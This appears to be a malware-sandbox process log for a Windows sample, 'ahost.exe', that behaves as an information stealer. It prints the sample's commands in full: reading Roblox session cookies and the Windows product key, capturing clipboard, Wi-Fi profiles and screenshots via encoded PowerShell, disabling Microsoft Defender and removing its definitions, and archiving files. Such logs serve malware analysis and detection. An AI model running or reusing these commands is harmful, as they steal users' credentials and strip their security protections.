              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
